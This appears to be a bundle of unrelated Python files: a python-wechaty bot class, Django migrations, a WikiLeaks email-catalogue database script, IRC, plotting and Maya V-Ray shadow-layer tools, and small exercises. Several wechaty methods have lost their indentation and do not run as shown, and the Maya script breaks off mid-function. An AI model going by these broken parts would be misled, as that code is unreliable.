>>> await bot.start()
Returns:
None
"""
# If the network is shut-down, we should catch the connection
# error and restart after a minute.
try:
await self.init_puppet()
await self.init_puppet_event_bridge(self.puppet)
log.info('starting puppet ...')
await self.puppet.start()
self.started = True
# register the system signal
except (requests.exceptions.ConnectionError, StreamTerminatedError, OSError):
# TODO: this problem is the most common error, so I add chinese & detail info for
# developer. this should be removed later.
# pylint: disable=C0301
error_info = '''The network is not good, the bot will try to restart after 60 seconds.
But here are some suggestions for you:
* 查看token是否可用?(过期或协议不可用)
* docker 服务是否正常启动?
* python-wechaty bot 是否正常启动?
* python-wechaty bot 是否能ping通docker服务?
* 由于版本细节问题,目前python-wechaty 支持最好的wechaty镜像为:[wechaty/wechaty:0.65](https://hub.docker.com/layers/wechaty/wechaty/0.65/images/sha256-d39b9fb5dece3a8ffa88b80a8ccfd916be14b9d0de72115732c3ee714b0d6a96?context=explore)
I suggest that you should follow the template code from: https://wechaty.readthedocs.io/zh_CN/latest/ to avoid the unnecessary bugs.
'''
log.error(error_info)
await asyncio.sleep(60)
await self.restart()
except WechatyPuppetError:
traceback.print_exc()
loop = asyncio.get_event_loop()
loop.stop()
except Exception as e: # pylint: disable=broad-except
print(e)
async def restart(self) -> None:
"""
restart the wechaty bot
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
>>> await bot.restart()
Returns:
None
"""
log.info('restarting the bot ...')
await self.stop()
await self.start()
    # pylint: disable=R0912,R0915,R0914
    async def init_puppet_event_bridge(self, puppet: Puppet) -> None:
        """
        init puppet event stream

        For every event the puppet can emit, register a listener that loads
        the high-level wrapper object(s), re-emits the event on this bot,
        awaits the matching on_* hook, and forwards to the plugin manager.

        NOTE: each listener closure is registered within the same loop
        iteration that defines it, so the classic late-binding-in-a-loop
        pitfall does not apply here.
        """
        log.info('init_puppet_event_bridge() <%s>', puppet)
        event_names = PUPPET_EVENT_DICT.keys()
        # prevent once time event to emit twice and more ...
        once_event = set()
        for event_name in event_names:
            if event_name == 'dong':
                def dong_listener(payload: EventDongPayload) -> None:
                    log.debug('receive <dong> event <%s>', payload)
                    self.emit('dong', payload.data)
                puppet.on('dong', dong_listener)
            elif event_name == 'error':
                async def error_listener(payload: EventErrorPayload) -> None:
                    if isinstance(payload, EventErrorPayload):
                        log.info('receive <error> event <%s>', payload)
                        self.emit('error', payload)
                        await self.on_error(payload)
                    else:
                        # Fixme: there is always <error> event, which the reason is not clear
                        # if there is no valid error message, it should not throw the error
                        if not payload:
                            return
                        log.error('internal error <%s>', payload)
                puppet.on('error', error_listener)
            elif event_name == 'heart-beat':
                async def heartbeat_listener(payload: EventHeartbeatPayload) -> None:
                    log.info('receive <heart-beat> event <%s>', payload)
                    self.emit('heartbeat', payload.data)
                    await self.on_heartbeat(payload)
                puppet.on('heart-beat', heartbeat_listener)
            elif event_name == 'friendship':
                async def friendship_listener(payload: EventFriendshipPayload) -> None:
                    log.info('receive <friendship> event <%s>', payload)
                    friendship = self.Friendship.load(payload.friendship_id)
                    await friendship.ready()
                    self.emit('friendship', friendship)
                    # this method will cause _events error, refer to
                    # :https://github.com/wechaty/python-wechaty/issues/122
                    # and this feature is considering to be removed, refer to
                    # https://github.com/wechaty/python-wechaty/issues/127
                    # friendship.contact().emit('friendship', friendship)
                    await self.on_friendship(friendship)
                    await self._plugin_manager.emit_events(
                        'friendship', friendship
                    )
                puppet.on('friendship', friendship_listener)
            elif event_name == 'login':
                async def login_listener(payload: EventLoginPayload) -> None:
                    # 'login' must only fire once per process; guard via once_event.
                    if 'login' in once_event:
                        return
                    once_event.add('login')
                    # init the plugins
                    await self._plugin_manager.start()
                    # set login contact_id
                    self.contact_id = payload.contact_id
                    log.info('receive <login> event <%s>', payload)
                    contact = self.ContactSelf.load(payload.contact_id)
                    await contact.ready()
                    self.emit('login', contact)
                    await self.on_login(contact)
                    # emit the login event to plugins
                    await self._plugin_manager.emit_events('login', contact)
                puppet.on('login', login_listener)
            elif event_name == 'logout':
                async def logout_listener(payload: EventLogoutPayload) -> None:
                    # TODO -> should to ContactSelf
                    log.info('receive <logout> event <%s>', payload)
                    contact = self.ContactSelf.load(payload.contact_id)
                    await contact.ready()
                    self.emit('logout', contact)
                    await self.on_logout(contact)
                    # emit the logout event to plugins
                    await self._plugin_manager.emit_events('logout', contact)
                puppet.on('logout', logout_listener)
            elif event_name == 'message':
                async def message_listener(payload: EventMessagePayload) -> None:
                    # sometimes, it will receive the specific message with two/three times
                    if SingleIdContainer.instance().exist(payload.message_id):
                        return
                    log.debug('receive <message> event <%s>', payload)
                    msg = self.Message.load(payload.message_id)
                    await msg.ready()
                    log.info('receive message <%s>', msg)
                    self.emit('message', msg)
                    await self.on_message(msg)
                    room = msg.room()
                    if room is not None:
                        # NOTE(review): the room object (not the message) is
                        # passed as the event argument here — confirm intent.
                        room.emit('message', room)
                    # emit the message event to plugins
                    await self._plugin_manager.emit_events('message', msg)
                puppet.on('message', message_listener)
            elif event_name == 'ready':
                async def ready_listener(payload: EventReadyPayload) -> None:
                    # 'ready' is also a fire-once event.
                    if 'ready' in once_event:
                        return
                    once_event.add('ready')
                    log.info('receive <ready> event <%s>', payload)
                    self.emit('ready', payload)
                    self._ready_state.on(True)
                    await self.on_ready(payload)
                puppet.on('ready', ready_listener)
            elif event_name == 'room-invite':
                async def room_invite_listener(payload: EventRoomInvitePayload) -> None:
                    log.info('receive <room-invite> event <%s>', payload)
                    invitation = self.RoomInvitation.load(
                        payload.room_invitation_id)
                    self.emit('room-invite', invitation)
                    await self.on_room_invite(invitation)
                    # emit the room-invite event to plugins
                    await self._plugin_manager.emit_events(
                        'room-invite',
                        invitation
                    )
                puppet.on('room-invite', room_invite_listener)
            elif event_name == 'room-join':
                async def room_join_listener(payload: EventRoomJoinPayload) -> None:
                    log.info('receive <room-join> event <%s>', payload)
                    room = self.Room.load(payload.room_id)
                    await room.ready()
                    invitees = [self.Contact.load(invitee_id)
                                for invitee_id in payload.invited_ids]
                    for invitee in invitees:
                        await invitee.ready()
                    inviter = self.Contact.load(payload.inviter_id)
                    await inviter.ready()
                    # timestamp is from hostie-server, but the value range is
                    # 10^10 ~ 10^13
                    # refer to
                    # :https://github.com/wechaty/python-wechaty/issues/1290
                    date = timestamp_to_date(payload.timestamp)
                    self.emit('room-join', room, invitees, inviter, date)
                    await self.on_room_join(room, invitees, inviter, date)
                    room.emit('join', invitees, inviter, date)
                    # emit the room-join event to plugins
                    await self._plugin_manager.emit_events(
                        'room-join', room,
                        invitees, inviter, date
                    )
                puppet.on('room-join', room_join_listener)
            elif event_name == 'room-leave':
                async def room_leave_listener(payload: EventRoomLeavePayload) -> None:
                    log.info('receive <room-leave> event <%s>', payload)
                    room = self.Room.load(payload.room_id)
                    # room info is dirty now
                    await room.ready(force_sync=True)
                    leavers = [self.Contact.load(inviter_id) for inviter_id
                               in payload.removed_ids]
                    for leaver in leavers:
                        await leaver.ready()
                    remover = self.Contact.load(payload.remover_id)
                    await remover.ready()
                    date = timestamp_to_date(payload.timestamp)
                    self.emit('room-leave', room, leavers, remover, date)
                    await self.on_room_leave(room, leavers, remover, date)
                    room.emit('leave', leavers, remover, date)
                    if self.puppet.self_id() in payload.removed_ids:
                        pass
                        # await self.puppet.room_payload(payload.room_id)
                        # await self.puppet.room_member_payload_dirty(
                        #     payload.room_id)
                    # emit the room-leave event to plugins
                    await self._plugin_manager.emit_events(
                        'room-leave', room, leavers, remover, date
                    )
                puppet.on('room-leave', room_leave_listener)
            elif event_name == 'room-topic':
                async def room_topic_listener(payload: EventRoomTopicPayload) -> None:
                    log.info('receive <room-topic> event <%s>', payload)
                    room: Room = self.Room.load(payload.room_id)
                    await room.ready()
                    changer = self.Contact.load(payload.changer_id)
                    await changer.ready()
                    date = timestamp_to_date(payload.timestamp)
                    self.emit('room-topic', room, payload.new_topic,
                              payload.old_topic, changer, date)
                    await self.on_room_topic(room, payload.new_topic,
                                             payload.old_topic, changer, date)
                    room.emit('topic', payload.new_topic, payload.old_topic,
                              changer, date)
                    # emit the room-topic to plugins
                    await self._plugin_manager.emit_events(
                        'room-topic', room,
                        payload.new_topic,
                        payload.old_topic,
                        changer, date
                    )
                puppet.on('room-topic', room_topic_listener)
            elif event_name == 'scan':
                async def scan_listener(payload: EventScanPayload) -> None:
                    log.info('receive <scan> event <%s>', payload)
                    qr_code = '' if payload.qrcode is None \
                        else payload.qrcode
                    if payload.status == ScanStatus.Waiting:
                        # Render the QR code in the terminal for the user.
                        qr_terminal(qr_code)
                        log.info(
                            'or you can scan qrcode from: '
                            'https://wechaty.js.org/qrcode/%s',
                            qr_code
                        )
                    self.emit('scan', qr_code, payload.status, payload.data)
                    await self.on_scan(qr_code, payload.status, payload.data)
                    # emit the scan event to plugins
                    await self._plugin_manager.emit_events(
                        'scan', qr_code,
                        payload.status,
                        payload.data
                    )
                puppet.on('scan', scan_listener)
            elif event_name == 'reset':
                # NOTE(review): this format string has a %s placeholder but no
                # argument is supplied — the literal '%s' is logged as-is.
                log.info('receive <reset> event <%s>')
            else:
                raise WechatyOperationError(f'event_name <{event_name}> unsupported!')
            log.info('initPuppetEventBridge() puppet.on(%s) (listenerCount:%s) '
                     'registering...',
                     event_name, puppet.listener_count(event_name))
def add_listener_function(self, event: str, listener: Callable[..., Any]) -> None:
"""add listener function to event emitter"""
self.on(event, listener)
async def init_puppet(self) -> None:
"""
init puppet grpc connection
"""
# Recreate puppet instance
self._puppet = self._load_puppet(self._options)
# Using metaclass to create a dynamic subclass to server multi bot instances.
meta_info = dict(_puppet=self.puppet, _wechaty=self, abstract=False)
self.ContactSelf = type('ContactSelf', (ContactSelf,), meta_info)
self.Contact = type('Contact', (Contact,), meta_info)
self.Favorite = type('Favorite', (Favorite,), meta_info)
self.Friendship = type('Friendship', (Friendship,), meta_info)
self.Image = type('Image', (Image,), meta_info)
self.Message = type('Message', (Message,), meta_info)
self.MiniProgram = type('MiniProgram', (MiniProgram,), meta_info)
self.UrlLink = type('UrlLink', (UrlLink,), meta_info)
self.Room = type('Room', (Room,), meta_info)
self.RoomInvitation = type('RoomInvitation', (RoomInvitation,), meta_info)
self.Tag = type('Tag', (Tag,), meta_info)
async def stop(self) -> None:
"""
stop the wechaty bot
Args:
None
Examples:
>>> await bot.stop()
Returns:
None
"""
log.info('wechaty is stopping ...')
await self.puppet.stop()
self.started = False
self._puppet = None
log.info('wechaty has been stopped gracefully!')
def user_self(self) -> ContactSelf:
"""
get user self
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
>>> contact = bot.user_self()
Returns:
ContactSelf: user self
"""
user_id = self.puppet.self_id()
user = self.ContactSelf.load(user_id)
# cast Contact -> ContactSelf
user = cast(ContactSelf, user)
return user
def self(self) -> ContactSelf:
"""
get user self
Args:
None
Examples:
>>> from wechaty import Wechaty
>>> bot = Wechaty()
>>> contact = bot.self()
Returns:
ContactSelf: user self
"""
return self.user_self()
|
# Generated by Django 3.1.6 on 2021-03-24 20:21
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema: Account, League, Sport, Team and Game.

    Auto-generated by Django 3.1.6; do not hand-edit operations once applied.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Account',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.TextField(unique=True)),
                ('display_name', models.TextField()),
                ('photo_url', models.TextField()),
                ('is_admin', models.BooleanField(default=False)),
            ],
        ),
        migrations.CreateModel(
            name='League',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('league_name', models.TextField()),
                ('start_date', models.DateField()),
                ('end_date', models.DateField()),
                ('reg_start_date', models.DateField()),
                ('reg_end_date', models.DateField()),
            ],
        ),
        migrations.CreateModel(
            name='Sport',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sport_name', models.TextField()),
                ('logo_url', models.TextField()),
                ('is_active', models.BooleanField()),
            ],
        ),
        migrations.CreateModel(
            name='Team',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('team_name', models.TextField(default='My Team')),
                ('league', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.league')),
                ('players', models.ManyToManyField(to='main.Account')),
            ],
        ),
        # League.sport is added after Team so 'main.sport' exists before the FK.
        migrations.AddField(
            model_name='league',
            name='sport',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.sport'),
        ),
        migrations.CreateModel(
            name='Game',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): named start_time but stored as DateField (date only) —
                # confirm whether DateTimeField was intended; changing it now needs a
                # new migration, not an edit here.
                ('start_time', models.DateField()),
                ('home_score', models.IntegerField(null=True)),
                ('away_score', models.IntegerField(null=True)),
                ('away_team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='away_team', to='main.team')),
                ('home_team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='home_team', to='main.team')),
                ('league', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.league')),
            ],
        ),
    ]
|
#!/usr/bin/env python3
import sqlite3
import os.path
import os
import re
import hashlib
# One-off maintenance script for wikileaks.db.  The previously-run steps are
# kept below as commented history.
#
# Fixes vs. the original:
#   * use the documented sqlite3.connect() factory instead of instantiating
#     sqlite3.Connection directly;
#   * close the connection explicitly -- ``with`` on a sqlite3 connection
#     only scopes the transaction (commit/rollback), it never closes it;
#   * close the cursor only after it was successfully created (the old
#     ``finally: cur.close()`` raised NameError if cursor() failed).
db = sqlite3.connect('wikileaks.db')
try:
    cur = db.cursor()
    try:
        ##
        # Add the original_name field
        ##
        # for r in cur.execute('SELECT * FROM podesta_emails').fetchall():
        #     cur.execute('INSERT INTO podesta_emails2(id, path, url, original_name, size, md5, sha1, sha256) VALUES (?, ?, ?, ?, ?, ?, ?, ?)', (
        #         r[0],                    # id
        #         r[1],                    # path
        #         r[2],                    # url
        #         os.path.basename(r[1]),  # original_name
        #         r[3],                    # size
        #         r[4],                    # md5
        #         r[5],                    # sha1
        #         r[6]                     # sha256
        #     ))

        ##
        # Fix the podesta paths
        ##
        # for r in cur.execute('SELECT id, original_name FROM podesta_emails').fetchall():
        #     cur.execute('UPDATE podesta_emails SET path = ? WHERE id = ?', (
        #         'podesta-emails/{0:0>5}_{1}'.format(r[0], r[1]),
        #         r[0]
        #     ))

        ##
        # Read a dnc/ folder produced by WikileaksEmailDownloader.py
        ##
        # pattern = re.compile(r'^(\d{5})_(.+)$')
        # for f in os.listdir('dnc/'):
        #     m = pattern.match(f)
        #     id, name = m.groups()
        #     id = int(id)
        #     url = f'https://wikileaks.org/dnc-emails/get/{id}'
        #     size = os.path.getsize(f'dnc/{f}')
        #     path = f'dnc-emails/{f}'
        #     with open(f'dnc/{f}', 'rb') as f:
        #         data = f.read()
        #     md5sum = hashlib.md5(data).hexdigest()
        #     sha1sum = hashlib.sha1(data).hexdigest()
        #     sha256sum = hashlib.sha256(data).hexdigest()
        #     cur.execute('INSERT INTO dnc_emails(id, path, url, original_name, size, md5, sha1, sha256) VALUES(?, ?, ?, ?, ?, ?, ?, ?)', (
        #         id, path, url, name, size, md5sum, sha1sum, sha256sum
        #     ))
        db.commit()
    finally:
        cur.close()
finally:
    db.close()
def inspect(item, grammar_name='G', mapper=None):
    """Render *item* as evaluable source text.

    A hit in *mapper* wins outright; otherwise the item is rendered by type
    (dict, ContainerSet, grammar symbols, Sentence, Production, tuple/list).
    Raises ValueError for anything unrecognised.
    """
    try:
        # EAFP: mapper=None raises TypeError, a miss raises KeyError.
        return mapper[item]
    except (TypeError, KeyError):
        recurse = lambda x: inspect(x, grammar_name, mapper)
        if isinstance(item, dict):
            body = ',\n '.join(f'{recurse(key)}: {recurse(value)}' for key, value in item.items())
            return f'{{\n {body} \n}}'
        if isinstance(item, ContainerSet):
            args = f'{ ", ".join(recurse(x) for x in item.set) } ,' if item.set else ''
            return f'ContainerSet({args} contains_epsilon={item.contains_epsilon})'
        # EOF/Epsilon are checked before the generic Symbol case on purpose.
        if isinstance(item, EOF):
            return f'{grammar_name}.EOF'
        if isinstance(item, Epsilon):
            return f'{grammar_name}.Epsilon'
        if isinstance(item, Symbol):
            return str(item)
        if isinstance(item, Sentence):
            parts = ', '.join(recurse(s) for s in item._symbols)
            return f'Sentence({parts})'
        if isinstance(item, Production):
            left = recurse(item.Left)
            right = recurse(item.Right)
            return f'Production({left}, {right})'
        if isinstance(item, (tuple, list)):
            opener, closer = ('(', ')') if isinstance(item, tuple) else ('[', ']')
            # Each element is followed by ", " (trailing separator kept).
            body = ''.join(f'{recurse(x)}, ' for x in item)
            return f'{opener} {body}{closer}'
        raise ValueError()
def pprint(item):
    """Pretty-print *item*: dicts as 'key ---> value' lines, lists one
    repr per line between brackets, anything else via plain print."""
    if isinstance(item, dict):
        for key, value in item.items():
            print(f'{key} ---> {value}')
    elif isinstance(item, list):
        print('[')
        for element in item:
            print(f' {element!r}')
        print(']')
    else:
        print(item)
# Generated by Django 2.1.7 on 2019-08-18 19:32
from django.db import migrations, models
class Migration(migrations.Migration):
    """Widen frame statistics to DecimalField(max_digits=10, decimal_places=2).

    Auto-generated by Django 2.1.7; applies the same type change to mean,
    median, mode and standard_deviation on FrameModel.
    """

    dependencies = [
        ('frame', '0003_auto_20190818_1930'),
    ]

    operations = [
        migrations.AlterField(
            model_name='framemodel',
            name='mean',
            field=models.DecimalField(decimal_places=2, max_digits=10),
        ),
        migrations.AlterField(
            model_name='framemodel',
            name='median',
            field=models.DecimalField(decimal_places=2, max_digits=10),
        ),
        migrations.AlterField(
            model_name='framemodel',
            name='mode',
            field=models.DecimalField(decimal_places=2, max_digits=10),
        ),
        migrations.AlterField(
            model_name='framemodel',
            name='standard_deviation',
            field=models.DecimalField(decimal_places=2, max_digits=10),
        ),
    ]
|
from sirmoDBMSnew import DBaccess

# Smoke-test script for the SirmotechBMS database wrapper: open a
# connection, exercise the consultant CRUD/report calls, then close.
SirmoDB = DBaccess("SirmotechBMS")
SirmoDB.connectDB()
# addNewConsultant(first, last, hire_date, birth_date, role_id, pay_id)
# -- presumably; argument meanings not visible here, confirm in DBaccess.
SirmoDB.addNewConsultant('Niki', 'White', '2019-02-03', '1979-10-25', '4','3')
SirmoDB.addNewConsultant('Sandy', 'Thompson', '2015-04-10', '1986-11-05', '1','1')
SirmoDB.removeConsultant("Niki","White")
# Report queries (results handling is inside DBaccess).
SirmoDB.getMinHourlyRateAVG()
SirmoDB.getConsultantInfo()
SirmoDB.getConsultantRolePay()
SirmoDB.connectDBClose()
__module_name__ = 'care.py'
__module_version__ = '1.0'
__module_description__ = 'Sajoin to #care Plugin'
__module_author__ = 'Ferus'
import xchat
def isChan():
    """Return True when the active xchat context is on the 'DatNode' network."""
    network = (xchat.get_context()).get_info('network')
    return network == 'DatNode'
def lols(word, word_eol, userdata):
    """SAJOIN a user to #care when our own message reads '<nick>, #care ...'.

    Registered for xchat's "Your Message" text event (word[1] is the message
    text).  Only acts on the DatNode network; always returns None so the
    event keeps propagating.
    """
    if isChan():
        try:
            msg = word[1].replace(",","").split()
            if msg[1] == '#care':
                person = msg[0]
                xchat.command("RAW SAJOIN {0} #care".format(person))
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; malformed/short messages are still ignored.
        except Exception:
            pass
    return None
# Run lols() on every message this client sends, then announce the plugin.
xchat.hook_print("Your Message", lols)
print("Loaded {0}, version {1}".format(__module_name__, __module_version__))
|
import matplotlib.pyplot as plt
import numpy as np

# Demo 1: a sine trace in the top-right cell of a 2x2 grid, shown
# without blocking so the second figure can follow.
time_axis = np.arange(0.0, 2.0, 0.01)
voltage = 1 + np.sin(2 * np.pi * time_axis)

fig, axes = plt.subplots(nrows=2, ncols=2)
panel = axes[0, 1]
panel.plot(time_axis, voltage)
panel.set(xlabel='time', ylabel='voltage', title='about as simple')
panel.grid()
fig.subplots_adjust(hspace=0.3, wspace=0.3)
plt.show(block=False)

# Demo 2: damped vs. undamped cosine, stacked vertically.
xs_damped = np.linspace(0.0, 5.0)
xs_plain = np.linspace(0.0, 2.0)
ys_damped = np.cos(2 * np.pi * xs_damped) * np.exp(-xs_damped)
ys_plain = np.cos(2 * np.pi * xs_plain)

fig, (ax_top, ax_bottom) = plt.subplots(2, 1)
fig.suptitle("A tale of 2 subplots")
ax_top.plot(xs_damped, ys_damped, 'o-')
ax_bottom.plot(xs_plain, ys_plain, '.-')
ax_top.set_ylabel('Damped oscillation')
ax_bottom.set_ylabel('Undamped')
plt.show()
|
# Poll results: respondent -> favourite language.
favorite_languages = {
    'jen': 'Python',
    'sarah': 'c',
    'edward': 'ruby',
    'phil': 'Python',
}

# Check whether a particular person took part in the poll.  Membership
# tests work on the dict directly -- ``.keys()`` was redundant.  Keys are
# stored lowercase, so the capitalised 'Alex' never matches (the point of
# this demo: Alex has not taken the poll).
if 'Alex' not in favorite_languages:
    print('Desculpe seu nome nao está na lista')
    print('Por favor participe de nossa enquete!')
|
#!/usr/bin/env python3
# Minimal CGI response: content-type header, the mandatory blank line
# separating headers from body, then the HTML body.
# (The original first line was a garbled double shebang.)
print("Content-type: text/html")
print()
print("<h1> Hello stranger</h1>")
|
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'vlanSync.settings'
import django
django.setup()
from sync.SyncHandler import SyncHandler
from sync.models import LocalVlans, RemoteVlans, Tmp
def main():
    """Run a single VLAN synchronisation pass."""
    SyncHandler.startSync()


if __name__ == '__main__':
    main()
|
#!/usr/bin/env python
# "Unless you know the code, it has no meaning." ~ John Connolly
__author__ = "hero24"
# Python 2 Memoization example:
def fib(n, mem=[0]):
    """Return the n-th Fibonacci number (fib(0) == 0, fib(1) == 1).

    Memoized through the *deliberately* mutable default ``mem``, which
    persists across calls and always holds fib(0..len(mem)-1) in order:
    the recursion on n-1 fills the cache up to index n-1 before the n-2
    lookup, so each append lands at its own index.
    """
    if n < len(mem):
        return mem[n]
    if n < 2:
        res = n
    else:
        # Fix: pass ``mem`` through so a caller-supplied cache is actually
        # used by the recursion (the original always recursed into the
        # shared default, desynchronizing any explicit ``mem`` argument).
        res = fib(n - 1, mem) + fib(n - 2, mem)
    mem.append(res)
    return res
|
#!/usr/bin/python
"""
-----------------------------------------------
Auto Layer Shadow Render Layers
Written By: Colton Fetters
Version: 1.0
First release: 2/17/2017
-----------------------------------------------
"""
import os
import maya.cmds as cmds
import maya.mel as mel
import render_layers as render_layers
import xgen as xgen
reload(render_layers)
reload(xgen)
class CreateVrayRenderElements(object):
    """Builders for the V-Ray render elements used by the shadow layers."""

    def create_dirt(self, layerName=''):
        """
        Create the VRayDirt extra-tex render element for a contact-shadow layer.
        @param layerName: String of Layer Name (prefixes every created node)
        @return: None
        """
        renderElement = mel.eval('vrayAddRenderElement ExtraTexElement;')
        renderElement_name = cmds.rename(renderElement, '{}_Contact_Shadow_AO'.format(layerName))
        vrayDirt = cmds.shadingNode('VRayDirt', asTexture=True)
        vrayDirt_shader = cmds.rename(vrayDirt, "{}_Contact_Shadow_AO_Shader".format(layerName))
        # Create 2d placement node and connect to vray dirt
        place2D = cmds.shadingNode("place2dTexture", asUtility=True)
        place2D_name = cmds.rename(place2D, "{}_AO_Place2d".format(layerName))
        cmds.connectAttr(place2D_name + ".outUV", vrayDirt_shader + ".uv", force=True)
        cmds.connectAttr(place2D_name + ".outUvFilterSize", vrayDirt_shader + ".uvFilterSize", force=True)
        # Connect vray dirt to vray render element
        cmds.connectAttr(vrayDirt_shader + ".outColor", renderElement_name + ".vray_texture_extratex", force=True)
        cmds.setAttr(renderElement_name + ".vray_explicit_name_extratex", "Contact_Shadow_AO", type="string")
        # Set vray dirt attributes specific to DTX contact shadow settings;
        # black/white are swapped so occlusion renders inverted.
        cmds.setAttr(vrayDirt_shader + ".blackColor", 1, 1, 1, type="double3")
        cmds.setAttr(vrayDirt_shader + ".whiteColor", 0, 0, 0, type="double3")
        cmds.setAttr(vrayDirt_shader + ".ignoreSelfOcclusion", 1)
        cmds.setAttr(vrayDirt_shader + ".resultAffectInclusive", 0)
        cmds.select(clear=True)

    def create_matte_shadow(self, *args):
        """
        Create Vray Matte Shadow Render Element.
        @param args: unused; accepted so the method can be wired to UI callbacks
        @return: None
        """
        renderElement = mel.eval('vrayAddRenderElement matteShadowChannel;')
        matteShadow_name = cmds.rename(renderElement, "Matte_Shadow")
        cmds.setAttr("{}.vray_name_matteshadow".format(matteShadow_name), "Matte_Shadow", type="string")
class ShadowOptions(object):
    """Create contact/cast shadow render layers and flip the per-shape
    visibility flags each layer needs."""

    def contact_shadow(self, cast=None, receive=None, layerName=''):
        """Build "<layerName>_Contact_Shadow": lights and shadows disabled;
        occlusion comes from the VRayDirt extra-tex element instead."""
        # Check to see if the geometry has been selected
        fullList_geo = cmds.ls(cast, receive)
        cmds.select(fullList_geo)
        cmds.createRenderLayer(name="{}_Contact_Shadow".format(layerName), makeCurrent=True, noRecurse=True)
        render_layers.GlobalRenderSettings().general_settings(layerName)
        # Register layer-local overrides before setting, so the global
        # switches only change on this render layer.
        cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doShadows")
        cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doLights")
        cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doDefaultLights")
        cmds.setAttr("vraySettings.globopt_light_doShadows", 0)
        cmds.setAttr("vraySettings.globopt_light_doLights", 0)
        cmds.setAttr("vraySettings.globopt_light_doDefaultLights", 0)
        CreateVrayRenderElements().create_dirt(layerName)
        self.cast_vis_off(cast)
        self.contact_receive(receive, layerName)
        self.lambert_over_ride(fullList_geo)

    def cast_shadow(self, cast=None, receive=None, layerName=''):
        """Build "<layerName>_Cast_Shadow": real lights/shadows on, with a
        matte-shadow render element capturing the cast shadows."""
        # Check to see if the geometry has been selected
        fullList_geo = cmds.ls(cast, receive)
        cmds.select(fullList_geo)
        cmds.createRenderLayer(name="%s_Cast_Shadow" % layerName, makeCurrent=True, noRecurse=True)
        render_layers.GlobalRenderSettings().general_settings(layerName)
        cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doShadows")
        cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doLights")
        cmds.editRenderLayerAdjustment("vraySettings.globopt_light_doDefaultLights")
        cmds.setAttr("vraySettings.globopt_light_doShadows", 1)
        cmds.setAttr("vraySettings.globopt_light_doLights", 1)
        cmds.setAttr("vraySettings.globopt_light_doDefaultLights", 0)
        CreateVrayRenderElements().create_matte_shadow()
        self.cast_vis_off(cast)
        self.cast_recieve(receive)
        self.lambert_over_ride(fullList_geo)

    def cast_vis_off(self, cast=None):
        """Hide shadow casters from camera: primary visibility and received
        shadows off on every descendant shape."""
        # Casts
        cmds.select(clear=True)
        for each in cast:
            try:
                geoShapes = cmds.listRelatives(each, allDescendents=True, type="shape")
                for shape in geoShapes:
                    try:
                        cmds.setAttr('%s.primaryVisibility' % shape, 0)
                        cmds.setAttr('%s.receiveShadows' % shape, 0)
                    except RuntimeError:
                        # Attribute locked/connected; report and keep going.
                        print('Error with %s Node' % each)
            except TypeError:
                # listRelatives returned None (no shape children).
                print('Error with %s Node' % each)

    def contact_receive(self, receive=None, layerName=''):
        """Collect receiver geometry into a set wired to the dirt shader's
        resultAffect, limiting occlusion to those objects."""
        # Receive
        cmds.select(clear=True)
        selectedObjects = cmds.ls(receive)
        cmds.select(selectedObjects)
        newSet = cmds.sets()
        setName = cmds.rename(newSet, "%s_Occlusion_Receive_Set" % (layerName))
        # NOTE(review): leftover debug print.
        print(setName + ".usedBy[0]")
        cmds.connectAttr(setName + ".usedBy[0]", "%s_Contact_Shadow_AO_Shader.resultAffect" % (layerName))

    def cast_recieve(self, receive=None):
        """Make receiver shapes catch shadows without casting any."""
        # Casts
        for each in receive:
            geoShapes = cmds.listRelatives(each, allDescendents=True, type="shape")
            try:
                for shape in geoShapes:
                    try:
                        cmds.setAttr('%s.castsShadows' % shape, 0)
                        cmds.setAttr('%s.receiveShadows' % shape, 1)
                    except RuntimeError:
                        print('Error with {} Node'.format(each))
            except TypeError:
                # geoShapes is None when the node has no shape children.
                print('Error with {} Shape Node'.format(each))

    def lambert_over_ride(self, selList, color='White'):
        """On the current render layer, override every shader assignment on
        *selList* with a flat white material (VRayMtl on WDS, lambert
        elsewhere), then tune any AO dirt shaders for the show."""
        curLayer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
        # Show code decides which override flavour to build.
        show = os.getenv('BD_PROD')
        if show == 'WDS':
            cmds.sets(name="{}_Matte_SG".format(color),
                      renderable=True, noSurfaceShader=True, empty=True)
            cmds.shadingNode('VRayMtl', name="{}_Matte_Shader".format(color), asShader=True)
            cmds.setAttr("{}_Matte_Shader.color".format(color), 1, 1, 1, type="double3")
            cmds.select(selList)
            geo = cmds.ls(dag=1, o=1, s=1, sl=1)
            for i in geo:
                geoSG = cmds.listConnections(i, type='shadingEngine')
                try:
                    for each in geoSG:
                        # Layer-local adjustment so the swap only applies here.
                        cmds.editRenderLayerAdjustment("{}.surfaceShader".format(each))
                        shaders = cmds.ls(cmds.listConnections(each), materials=1)
                        try:
                            cmds.disconnectAttr("{}.outColor".format(shaders[0]), "{}.surfaceShader".format(each))
                            cmds.connectAttr("{}_Matte_Shader.outColor".format(color), "{}.surfaceShader".format(each))
                        except RuntimeError:
                            pass
                except TypeError:
                    pass
        else:
            override = cmds.shadingNode('lambert', asShader=True)
            lamShader = override + 'SG'
            lamConnect = override + '.outColor'
